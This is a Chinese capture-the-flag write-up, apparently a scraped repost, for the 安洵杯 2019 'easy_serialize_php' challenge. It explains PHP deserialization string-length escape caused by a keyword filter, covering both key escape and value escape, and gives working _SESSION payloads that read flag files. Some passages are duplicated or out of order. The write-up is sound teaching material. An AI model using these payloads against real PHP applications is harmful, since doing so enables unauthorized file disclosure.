[安洵杯 2019]easy_serialize_php
2021-04-20 07:28
标签:lte php 另一个 filter 两种 长度 强制 键值对 一个 PHP反序列化的对象逃逸 任何具有一定结构的数据,只要经过了某些处理而把自身结构改变,则可能会产生漏洞。 例如: where->hacker,这样词数由五个增加到6个。 过滤函数filter()是对serialize($_SESSION)进行过滤,滤掉一些关键字 值逃逸: var_dump的结果为: 键逃逸: 这儿只需要一个键值对就行了,我们直接构造会被过滤的键,这样值得一部分充当键,剩下得一部分作为单独得键值对 var_dump的结果为: 这儿得s:7:""之所以为空,是因为我们构造得键flagphp都是会被过滤得,所以显示为空,这样就能吃掉一部分值了,然后将剩下得值充当另一个对象逃逸出去~~ 回到题目,我们首先看源码 根据源码,我们先对f传参phpinfo 构造payload来对 解释一下: $serialize_info的内容为 刚好把后面多余的img部分截断掉 payload: 读取/d0g3_fllllllag 参考链接: https://www.jianshu.com/p/1f44650b0822 [安洵杯 2019]easy_serialize_php 标签:lte php 另一个 filter 两种 长度 强制 键值对 一个 原文地址:https://www.cnblogs.com/wangtanzhi/p/12261610.html0x00 知识点
参考链接:
https://blog.csdn.net/a3320315/article/details/104118688/
过滤函数分为两种情况
第一种为关键词数增加
第二种为关键词数减少
例如:直接过滤掉一些关键词,例如这道题目中。
那么我们有两种方法:
键逃逸和值逃逸
这儿需要两个连续的键值对,由第一个的值覆盖第二个的键,这样第二个值就逃逸出去,单独作为一个键值对_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}&function=show_image
"a:3{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"
_SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
"a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mbGxsbGxsYWc=";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"
0x01 解题
过滤函数filter()是对serialize($_SESSION)进行过滤,滤掉一些关键字
正常传img参数进去会被sha1加密,我们应该用别的方法控制$_SESSION中的参数。
本来挺好的序列化的字符串,按某种去掉了一些关键字,本身就不对,本身就涉及到可能破坏原有结构而无法正常反序列化的问题。这里是利用反序列化长度逃逸控制了img参数。之前有一道题目是关键字替换导致字符串长度变长,把后面的原有参数挤出去了,
本题是关键字被置空导致长度变短,后面的值的单引号闭合了前面的值的单引号,导致一些内容逃逸。。
extract后覆盖了两个没用的属性,但是后面又强制加了一个我们不可控的img属性
d0g3_f1ag.php读取。;s:14:"phpflagphpflag";s:7:"xxxxxxx";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
这里首先phpflagphpflag会被过滤为空,吃掉一部分值a:2:{s:7:"";s:48:";s:7:"xxxxxxx";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";
_SESSION[phpflag]=;s:7:"xxxxxxx";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
payload:_SESSION[phpflag]=;s:14:"phpflagphpflag";s:7:"xxxxxxx";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
https://blog.csdn.net/a3320315/article/details/104118688/
下一篇:30 jQuery——操作事件
文章标题:[安洵杯 2019]easy_serialize_php
文章链接:http://soscw.com/essay/77037.html